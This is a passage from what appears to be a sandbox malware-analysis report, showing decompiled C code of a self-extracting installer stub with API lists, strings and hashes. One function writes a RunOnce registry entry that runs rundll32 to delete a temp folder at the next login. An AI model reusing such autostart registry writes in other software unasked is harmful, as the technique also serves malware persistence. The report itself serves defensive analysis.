                                                                                                                                                                                                        					FreeLibrary(_t66);
                                                                                                                                                                                                        					_t85 =  *0xc87a0; // 0x0
                                                                                                                                                                                                        					return 0 | _t85 != 0x00000000;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					GetTempPathA(0x104, 0xc88c0);
                                                                                                                                                                                                        					_t61 = 0xc88c0;
                                                                                                                                                                                                        					_t4 =  &(_t61[1]); // 0xc88c1
                                                                                                                                                                                                        					_t65 = _t4;
                                                                                                                                                                                                        					do {
                                                                                                                                                                                                        						_t42 =  *_t61;
                                                                                                                                                                                                        						_t61 =  &(_t61[1]);
                                                                                                                                                                                                        					} while (_t42 != 0);
                                                                                                                                                                                                        					_t5 = _t61 - _t65 + 0xc88c0; // 0x191181
                                                                                                                                                                                                        					_t44 = CharPrevA(0xc88c0, _t5);
                                                                                                                                                                                                        					_v8 = _t44;
                                                                                                                                                                                                        					if( *_t44 == 0x5c &&  *(CharPrevA(0xc88c0, _t44)) != 0x3a) {
                                                                                                                                                                                                        						 *_v8 = 0;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L10;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}




























                                                                                                                                                                                                        0x000c4234
                                                                                                                                                                                                        0x000c423c
                                                                                                                                                                                                        0x000c4240
                                                                                                                                                                                                        0x000c43b2
                                                                                                                                                                                                        0x000c43b7
                                                                                                                                                                                                        0x000c43c0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c43c5
                                                                                                                                                                                                        0x000c424c
                                                                                                                                                                                                        0x000c4252
                                                                                                                                                                                                        0x000c4257
                                                                                                                                                                                                        0x000c43a4
                                                                                                                                                                                                        0x000c43a5
                                                                                                                                                                                                        0x000c43ab
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c43ab
                                                                                                                                                                                                        0x000c4263
                                                                                                                                                                                                        0x000c4269
                                                                                                                                                                                                        0x000c426e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c427a
                                                                                                                                                                                                        0x000c4280
                                                                                                                                                                                                        0x000c4285
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c428d
                                                                                                                                                                                                        0x000c4293
                                                                                                                                                                                                        0x000c42e6
                                                                                                                                                                                                        0x000c42e9
                                                                                                                                                                                                        0x000c42ef
                                                                                                                                                                                                        0x000c42f4
                                                                                                                                                                                                        0x000c42f7
                                                                                                                                                                                                        0x000c4300
                                                                                                                                                                                                        0x000c4307
                                                                                                                                                                                                        0x000c430e
                                                                                                                                                                                                        0x000c4315
                                                                                                                                                                                                        0x000c431c
                                                                                                                                                                                                        0x000c4322
                                                                                                                                                                                                        0x000c4326
                                                                                                                                                                                                        0x000c432d
                                                                                                                                                                                                        0x000c432d
                                                                                                                                                                                                        0x000c432f
                                                                                                                                                                                                        0x000c4334
                                                                                                                                                                                                        0x000c4343
                                                                                                                                                                                                        0x000c4349
                                                                                                                                                                                                        0x000c434d
                                                                                                                                                                                                        0x000c4354
                                                                                                                                                                                                        0x000c4354
                                                                                                                                                                                                        0x000c435d
                                                                                                                                                                                                        0x000c436e
                                                                                                                                                                                                        0x000c436e
                                                                                                                                                                                                        0x000c437d
                                                                                                                                                                                                        0x000c4383
                                                                                                                                                                                                        0x000c4387
                                                                                                                                                                                                        0x000c438e
                                                                                                                                                                                                        0x000c438e
                                                                                                                                                                                                        0x000c4387
                                                                                                                                                                                                        0x000c4391
                                                                                                                                                                                                        0x000c4399
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c4295
                                                                                                                                                                                                        0x000c429f
                                                                                                                                                                                                        0x000c42a5
                                                                                                                                                                                                        0x000c42aa
                                                                                                                                                                                                        0x000c42aa
                                                                                                                                                                                                        0x000c42ad
                                                                                                                                                                                                        0x000c42ad
                                                                                                                                                                                                        0x000c42af
                                                                                                                                                                                                        0x000c42b0
                                                                                                                                                                                                        0x000c42b6
                                                                                                                                                                                                        0x000c42c2
                                                                                                                                                                                                        0x000c42c8
                                                                                                                                                                                                        0x000c42ce
                                                                                                                                                                                                        0x000c42e4
                                                                                                                                                                                                        0x000c42e4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c42ce

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 000C4236
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 000C424C
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,000000C3), ref: 000C4263
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 000C427A
                                                                                                                                                                                                        • GetTempPathA.KERNEL32(00000104,000C88C0,?,00000001), ref: 000C429F
                                                                                                                                                                                                        • CharPrevA.USER32(000C88C0,00191181,?,00000001), ref: 000C42C2
                                                                                                                                                                                                        • CharPrevA.USER32(000C88C0,00000000,?,00000001), ref: 000C42D6
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 000C4391
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 000C43A5
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                                        • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                                        • API String ID: 1865808269-1731843650
                                                                                                                                                                                                        • Opcode ID: 548a1dba8d1072784760ffaa5c2c5b7d0c7bb7f195f28504c0bd994573f5edfb
                                                                                                                                                                                                        • Instruction ID: b3160db8caa77fc3b0126d20330156f374de43fb65d4b6d3c5a6d3e4676ade32
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 548a1dba8d1072784760ffaa5c2c5b7d0c7bb7f195f28504c0bd994573f5edfb
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 42412470A00244AFE710AF74DCA8FAE7BB4FB46348F54416DE941A7281CF788D05C769
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E000C2773(CHAR* __ecx, char* _a4) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				char _v269;
                                                                                                                                                                                                        				CHAR* _v276;
                                                                                                                                                                                                        				int _v280;
                                                                                                                                                                                                        				void* _v284;
                                                                                                                                                                                                        				int _v288;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t23;
                                                                                                                                                                                                        				intOrPtr _t34;
                                                                                                                                                                                                        				int _t45;
                                                                                                                                                                                                        				int* _t50;
                                                                                                                                                                                                        				CHAR* _t52;
                                                                                                                                                                                                        				CHAR* _t61;
                                                                                                                                                                                                        				char* _t62;
                                                                                                                                                                                                        				int _t63;
                                                                                                                                                                                                        				CHAR* _t64;
                                                                                                                                                                                                        				signed int _t65;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t52 = __ecx;
                                                                                                                                                                                                        				_t23 =  *0xc8004; // 0x374600bf
                                                                                                                                                                                                        				_v8 = _t23 ^ _t65;
                                                                                                                                                                                                        				_t62 = _a4;
                                                                                                                                                                                                        				_t50 = 0;
                                                                                                                                                                                                        				_t61 = __ecx;
                                                                                                                                                                                                        				_v276 = _t62;
                                                                                                                                                                                                        				 *((char*)(__ecx)) = 0;
                                                                                                                                                                                                        				if( *_t62 != 0x23) {
                                                                                                                                                                                                        					_t63 = 0x104;
                                                                                                                                                                                                        					goto L14;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t64 = _t62 + 1;
                                                                                                                                                                                                        					_v269 = CharUpperA( *_t64);
                                                                                                                                                                                                        					_v276 = CharNextA(CharNextA(_t64));
                                                                                                                                                                                                        					_t63 = 0x104;
                                                                                                                                                                                                        					_t34 = _v269;
                                                                                                                                                                                                        					if(_t34 == 0x53) {
                                                                                                                                                                                                        						L14:
                                                                                                                                                                                                        						GetSystemDirectoryA(_t61, _t63);
                                                                                                                                                                                                        						goto L15;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						if(_t34 == 0x57) {
                                                                                                                                                                                                        							GetWindowsDirectoryA(_t61, 0x104);
                                                                                                                                                                                                        							goto L16;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_push(_t52);
                                                                                                                                                                                                        							_v288 = 0x104;
                                                                                                                                                                                                        							E000C1781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                                                                                                                                                                        							_t59 = 0x104;
                                                                                                                                                                                                        							E000C658A( &_v268, 0x104, _v276);
                                                                                                                                                                                                        							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                                                                                                                                                                        								L16:
                                                                                                                                                                                                        								_t59 = _t63;
                                                                                                                                                                                                        								E000C658A(_t61, _t63, _v276);
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								if(RegQueryValueExA(_v284, 0xc1140, 0,  &_v280, _t61,  &_v288) == 0) {
                                                                                                                                                                                                        									_t45 = _v280;
                                                                                                                                                                                                        									if(_t45 != 2) {
                                                                                                                                                                                                        										L9:
                                                                                                                                                                                                        										if(_t45 == 1) {
                                                                                                                                                                                                        											goto L10;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                        											_t45 = _v280;
                                                                                                                                                                                                        											goto L9;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											_t59 = 0x104;
                                                                                                                                                                                                        											E000C1680(_t61, 0x104,  &_v268);
                                                                                                                                                                                                        											L10:
                                                                                                                                                                                                        											_t50 = 1;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								RegCloseKey(_v284);
                                                                                                                                                                                                        								L15:
                                                                                                                                                                                                        								if(_t50 == 0) {
                                                                                                                                                                                                        									goto L16;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E000C6CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                                                                                                                                                                        			}























                                                                                                                                                                                                        0x000c2773
                                                                                                                                                                                                        0x000c277e
                                                                                                                                                                                                        0x000c2785
                                                                                                                                                                                                        0x000c278a
                                                                                                                                                                                                        0x000c278d
                                                                                                                                                                                                        0x000c2790
                                                                                                                                                                                                        0x000c2792
                                                                                                                                                                                                        0x000c2798
                                                                                                                                                                                                        0x000c279d
                                                                                                                                                                                                        0x000c28b2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c27a3
                                                                                                                                                                                                        0x000c27a3
                                                                                                                                                                                                        0x000c27af
                                                                                                                                                                                                        0x000c27c2
                                                                                                                                                                                                        0x000c27c8
                                                                                                                                                                                                        0x000c27cd
                                                                                                                                                                                                        0x000c27d5
                                                                                                                                                                                                        0x000c28b7
                                                                                                                                                                                                        0x000c28b9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c27db
                                                                                                                                                                                                        0x000c27dd
                                                                                                                                                                                                        0x000c28aa
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c27e3
                                                                                                                                                                                                        0x000c27e3
                                                                                                                                                                                                        0x000c27ec
                                                                                                                                                                                                        0x000c27f8
                                                                                                                                                                                                        0x000c2803
                                                                                                                                                                                                        0x000c280b
                                                                                                                                                                                                        0x000c2831
                                                                                                                                                                                                        0x000c28c3
                                                                                                                                                                                                        0x000c28c9
                                                                                                                                                                                                        0x000c28cd
                                                                                                                                                                                                        0x000c2837
                                                                                                                                                                                                        0x000c285a
                                                                                                                                                                                                        0x000c285c
                                                                                                                                                                                                        0x000c2865
                                                                                                                                                                                                        0x000c2892
                                                                                                                                                                                                        0x000c2895
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c2867
                                                                                                                                                                                                        0x000c2878
                                                                                                                                                                                                        0x000c288c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c287a
                                                                                                                                                                                                        0x000c2880
                                                                                                                                                                                                        0x000c2885
                                                                                                                                                                                                        0x000c2897
                                                                                                                                                                                                        0x000c2899
                                                                                                                                                                                                        0x000c2899
                                                                                                                                                                                                        0x000c2878
                                                                                                                                                                                                        0x000c2865
                                                                                                                                                                                                        0x000c28a0
                                                                                                                                                                                                        0x000c28bf
                                                                                                                                                                                                        0x000c28c1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c28c1
                                                                                                                                                                                                        0x000c2831
                                                                                                                                                                                                        0x000c27dd
                                                                                                                                                                                                        0x000c27d5
                                                                                                                                                                                                        0x000c28e5

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CharUpperA.USER32(374600BF,00000000,00000000,00000000), ref: 000C27A8
                                                                                                                                                                                                        • CharNextA.USER32(0000054D), ref: 000C27B5
                                                                                                                                                                                                        • CharNextA.USER32(00000000), ref: 000C27BC
                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 000C2829
                                                                                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,000C1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 000C2852
                                                                                                                                                                                                        • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 000C2870
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 000C28A0
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 000C28AA
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 000C28B9
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 000C27E4
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                                                                                                        • API String ID: 2659952014-2428544900
                                                                                                                                                                                                        • Opcode ID: 9da1cebcd890e436b90913832c8f93dc16706034e32fca5b92037c9bfa95cd05
                                                                                                                                                                                                        • Instruction ID: a8bffff3d2f9fa73995c40869fe33222611d9d679f22f7a26d8ebc1b6d99e8bd
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9da1cebcd890e436b90913832c8f93dc16706034e32fca5b92037c9bfa95cd05
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E541C270A0112CAFEB249B649C85FFE77BCEB16700F1440ADFA49D2141CB748E898FA1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 62%
                                                                                                                                                                                                        			E000C2267() {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				char _v836;
                                                                                                                                                                                                        				void* _v840;
                                                                                                                                                                                                        				int _v844;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t19;
                                                                                                                                                                                                        				intOrPtr _t33;
                                                                                                                                                                                                        				void* _t38;
                                                                                                                                                                                                        				intOrPtr* _t42;
                                                                                                                                                                                                        				void* _t45;
                                                                                                                                                                                                        				void* _t47;
                                                                                                                                                                                                        				void* _t49;
                                                                                                                                                                                                        				signed int _t51;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t19 =  *0xc8004; // 0x374600bf
                                                                                                                                                                                                        				_t20 = _t19 ^ _t51;
                                                                                                                                                                                                        				_v8 = _t19 ^ _t51;
                                                                                                                                                                                                        				if( *0xc8530 != 0) {
                                                                                                                                                                                                        					_push(_t49);
                                                                                                                                                                                                        					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                                                                                                                                                                        						_push(_t38);
                                                                                                                                                                                                        						_v844 = 0x238;
                                                                                                                                                                                                        						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                                                                                                                                                                        							_push(_t47);
                                                                                                                                                                                                        							memset( &_v268, 0, 0x104);
                                                                                                                                                                                                        							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                        								E000C658A( &_v268, 0x104, 0xc1140);
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_push("C:\Users\jones\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                        							E000C171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                                                                                                                                                                        							_t42 =  &_v836;
                                                                                                                                                                                                        							_t45 = _t42 + 1;
                                                                                                                                                                                                        							_pop(_t47);
                                                                                                                                                                                                        							do {
                                                                                                                                                                                                        								_t33 =  *_t42;
                                                                                                                                                                                                        								_t42 = _t42 + 1;
                                                                                                                                                                                                        							} while (_t33 != 0);
                                                                                                                                                                                                        							RegSetValueExA(_v840, "wextract_cleanup1", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t20 = RegCloseKey(_v840);
                                                                                                                                                                                                        						_pop(_t38);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_pop(_t49);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E000C6CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                                                                                                                                                                        			}



















                                                                                                                                                                                                        0x000c2272
                                                                                                                                                                                                        0x000c2277
                                                                                                                                                                                                        0x000c2279
                                                                                                                                                                                                        0x000c2283
                                                                                                                                                                                                        0x000c2289
                                                                                                                                                                                                        0x000c22ab
                                                                                                                                                                                                        0x000c22b1
                                                                                                                                                                                                        0x000c22c4
                                                                                                                                                                                                        0x000c22e0
                                                                                                                                                                                                        0x000c22e6
                                                                                                                                                                                                        0x000c22f5
                                                                                                                                                                                                        0x000c230d
                                                                                                                                                                                                        0x000c231c
                                                                                                                                                                                                        0x000c231c
                                                                                                                                                                                                        0x000c2321
                                                                                                                                                                                                        0x000c233a
                                                                                                                                                                                                        0x000c2342
                                                                                                                                                                                                        0x000c2348
                                                                                                                                                                                                        0x000c234b
                                                                                                                                                                                                        0x000c234c
                                                                                                                                                                                                        0x000c234c
                                                                                                                                                                                                        0x000c234e
                                                                                                                                                                                                        0x000c234f
                                                                                                                                                                                                        0x000c236e
                                                                                                                                                                                                        0x000c236e
                                                                                                                                                                                                        0x000c237a
                                                                                                                                                                                                        0x000c2380
                                                                                                                                                                                                        0x000c2380
                                                                                                                                                                                                        0x000c2381
                                                                                                                                                                                                        0x000c2381
                                                                                                                                                                                                        0x000c238f

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 000C22A3
                                                                                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000000,?,?,00000001), ref: 000C22D8
                                                                                                                                                                                                        • memset.MSVCRT ref: 000C22F5
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 000C2305
                                                                                                                                                                                                        • RegSetValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 000C236E
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 000C237A
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 000C232D
                                                                                                                                                                                                        • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 000C2321
                                                                                                                                                                                                        • wextract_cleanup1, xrefs: 000C227C, 000C22CD, 000C2363
                                                                                                                                                                                                        • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 000C2299
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup1
                                                                                                                                                                                                        • API String ID: 3027380567-2601155950
                                                                                                                                                                                                        • Opcode ID: 409cff1b2058ad6e8037be328b8298181a0842559f020667dbeaec39490c0237
                                                                                                                                                                                                        • Instruction ID: 88d57c2fb814b2258c2dfbeb91ec399d39fbbe28f29704633151100b2a2b4094
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 409cff1b2058ad6e8037be328b8298181a0842559f020667dbeaec39490c0237
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F631F771A00218ABDB619B10DC49FEF7B7CEF55740F1001EDB90DAA051EA75AF88CB50
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 87%
                                                                                                                                                                                                        			E000C3100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                        				void* _t8;
                                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                                        				void* _t15;
                                                                                                                                                                                                        				struct HWND__* _t16;
                                                                                                                                                                                                        				struct HWND__* _t33;
                                                                                                                                                                                                        				struct HWND__* _t34;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t8 = _a8 - 0xf;
                                                                                                                                                                                                        				if(_t8 == 0) {
                                                                                                                                                                                                        					if( *0xc8590 == 0) {
                                                                                                                                                                                                        						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                                                                                                                                                                        						 *0xc8590 = 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L13:
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t11 = _t8 - 1;
                                                                                                                                                                                                        				if(_t11 == 0) {
                                                                                                                                                                                                        					L7:
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					L8:
                                                                                                                                                                                                        					EndDialog(_a4, ??);
                                                                                                                                                                                                        					L9:
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t15 = _t11 - 0x100;
                                                                                                                                                                                                        				if(_t15 == 0) {
                                                                                                                                                                                                        					_t16 = GetDesktopWindow();
                                                                                                                                                                                                        					_t33 = _a4;
                                                                                                                                                                                                        					E000C43D0(_t33, _t16);
                                                                                                                                                                                                        					SetDlgItemTextA(_t33, 0x834,  *0xc8d4c);
                                                                                                                                                                                                        					SetWindowTextA(_t33, "cent");
                                                                                                                                                                                                        					SetForegroundWindow(_t33);
                                                                                                                                                                                                        					_t34 = GetDlgItem(_t33, 0x834);
                                                                                                                                                                                                        					 *0xc88b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                                                                                                                                                                        					SetWindowLongA(_t34, 0xfffffffc, E000C30C0);
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t15 != 1) {
                                                                                                                                                                                                        					goto L13;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_a12 != 6) {
                                                                                                                                                                                                        					if(_a12 != 7) {
                                                                                                                                                                                                        						goto L9;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L7;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_push(1);
                                                                                                                                                                                                        				goto L8;
                                                                                                                                                                                                        			}









                                                                                                                                                                                                        0x000c3108
                                                                                                                                                                                                        0x000c310b
                                                                                                                                                                                                        0x000c31b7
                                                                                                                                                                                                        0x000c31ca
                                                                                                                                                                                                        0x000c31d0
                                                                                                                                                                                                        0x000c31d0
                                                                                                                                                                                                        0x000c31da
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c31da
                                                                                                                                                                                                        0x000c3111
                                                                                                                                                                                                        0x000c3114
                                                                                                                                                                                                        0x000c3136
                                                                                                                                                                                                        0x000c3136
                                                                                                                                                                                                        0x000c3138
                                                                                                                                                                                                        0x000c313b
                                                                                                                                                                                                        0x000c3141
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3143
                                                                                                                                                                                                        0x000c3116
                                                                                                                                                                                                        0x000c311b
                                                                                                                                                                                                        0x000c314b
                                                                                                                                                                                                        0x000c3151
                                                                                                                                                                                                        0x000c3158
                                                                                                                                                                                                        0x000c316a
                                                                                                                                                                                                        0x000c3176
                                                                                                                                                                                                        0x000c317d
                                                                                                                                                                                                        0x000c318b
                                                                                                                                                                                                        0x000c319e
                                                                                                                                                                                                        0x000c31a3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c31ad
                                                                                                                                                                                                        0x000c3120
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c312a
                                                                                                                                                                                                        0x000c3134
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3134
                                                                                                                                                                                                        0x000c312c
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • EndDialog.USER32(?,00000000), ref: 000C313B
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 000C314B
                                                                                                                                                                                                        • SetDlgItemTextA.USER32(?,00000834), ref: 000C316A
                                                                                                                                                                                                        • SetWindowTextA.USER32(?,cent), ref: 000C3176
                                                                                                                                                                                                        • SetForegroundWindow.USER32(?), ref: 000C317D
                                                                                                                                                                                                        • GetDlgItem.USER32(?,00000834), ref: 000C3185
                                                                                                                                                                                                        • GetWindowLongA.USER32(00000000,000000FC), ref: 000C3190
                                                                                                                                                                                                        • SetWindowLongA.USER32(00000000,000000FC,000C30C0), ref: 000C31A3
                                                                                                                                                                                                        • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 000C31CA
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
